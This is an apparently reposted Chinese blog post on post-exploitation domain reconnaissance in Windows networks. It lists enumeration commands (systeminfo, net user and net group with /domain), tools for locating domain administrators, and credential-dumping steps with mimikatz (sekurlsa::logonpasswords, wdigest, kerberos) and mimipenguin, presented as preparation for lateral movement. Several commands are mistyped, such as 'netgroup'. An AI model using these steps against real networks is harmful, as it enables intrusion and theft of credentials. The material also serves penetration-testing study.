【后渗透】简单的域信息收集

admin 2023年3月31日17:31:38评论35 views字数 1976阅读6分35秒阅读模式

点击关注公众号,知识干货及时送达👇


【后渗透】简单的域信息收集

一、基本信息收集

目的:了解当前拿到的计算机的基本信息,为后续判断服务器角色,网络环境做准备。

systeminfo

主机详细信息(操作系统版本、多少位的操作系统、补丁编号)

net start

启动服务(看他开了什么服务,判断他是什么角色)

tasklist

进程列表(看他开了哪些进程,进一步判断)

schtasks

计划任务

【后渗透】简单的域信息收集

二、网络信息收集/判断存不存在域

ipconfig /all

看他的主dns后缀,判断他有没有域

net view/domain   

看看有没有反应,如果有那么就存在域

net time/domain

看看他时间会不会返回域名

nslookup +  net time/domain 

返回的域名,看看域控的ip地址

netstat -ano

看看本机网络端口的开放情况

Whoami/all

获取域id——sid,域id是唯一id


【后渗透】简单的域信息收集

三、用户信息收集

1,用户角色信息:

Domain Admins

域管理员(默认对域控制器有完全控制权)

Domain  Computers

域内机器

Domain  Controllers

域控制器

Domain Guest

域访客,权限低

Domain Users

域用户

Enterprise  Admins

企业系统管理员用户(默认对域控制器有完全控制权)

2,相关用户收集操作命令: 

whoami   /all 用户权限
net config workstation 登录信息
net user 查看本地用户
net localgroup 本地用户组
net user /domain 查看当前域内的用户
net group/domain 获取域用户组信息
wmic useraccount get /all 涉及域用户详细信息
net group   "Domain Admins" /domain 查询域管理员账户
net group   "Enterprise Admins" /domain 查询管理员用户组
net group   "Domain Controllers" /domain 查询域控制器
net user bypass /domain  获取指定域用户bypass的详细信息
【后渗透】简单的域信息收集

四、定位域管理员

1Psloggedon.exe

Psloggedon可以查看本地登录的用户、域登录的用户以及远程计算机登录的用户,下载psloggedon后在当前目录打开命令行即可使用,说明参数如下:

-

显示支持的选项和用于输出值的测量单位

-l 只显示本地登录,而不显示本地和网络资源登录
-x 不显示登录时间
computername 指定要列出登录信息的计算机的名称
username

如果指定用户名,PsLoggedOn将在网络中搜索该用户登录的计算机

2PVEDFindADUser

可查找活动目录用户的位置、枚举域用户、查找特定计算机上登录的用户(本地用户、通过RDP登录的用户、用于运行服务的用户、计划任务的用户),直接运行以下命令即可显示域中所有计算机上登录的所有用户,结果输出到report.csv文件中。

PVEFindADUser.exe -current
【后渗透】简单的域信息收集

五、凭据信息收集工具利用

旨在收集各种密文,明文,口令等,为后续横向渗透做好测试准备。

1mimikatz

首先提升权限 

privilege::debug

然后抓取明文密码,直接运行:

mimikatz.exe "privilege::debug"

再利用sekurlsa模块,获取密码信息

sekurlsa::logonpasswords

其他命令:

sekurlsa::msv 提取ntlm hash凭证
sekurlsa::wdigest 提取用户密码明文
sekurlsa::kerberos 提取域账户凭证

2mimipenguin

直接./mimipenguin.sh执行脚本即可,可以获取以下内容 

1.站点源码备份文件、数据库备份文件等 2.各类数据库 Web 管理入口,如PHPMyAdmin3.浏览器保存密码、浏览器 Cookies4.其他用户会话、3389 和 ipc$连接记录、回收站内容 5.Windows 保存的 WIFI 密码 6.网络内部的各种帐号和密码,如:Email、VPN、FTP、OA 等
【后渗透】简单的域信息收集

六、查找域管理进程

1、 本机检查

netgroup Domain Admins/domain             获取域管理员列表tasklist /v                               列出本机的所有进程及进程用户

2、查询域控的域用户会话

netgroup Domain Controllers/domain        查询域控制器列表net group Domain admins/domain            收集域管理员列 

- End -

觉得内容不错,就点下在看
如果不想错过新的内容推送,可以设为星标【后渗透】简单的域信息收集

原文始发于微信公众号(希石安全团队):【后渗透】简单的域信息收集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月31日17:31:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【后渗透】简单的域信息收集https://cn-sec.com/archives/1642546.html

发表评论

匿名网友 填写信息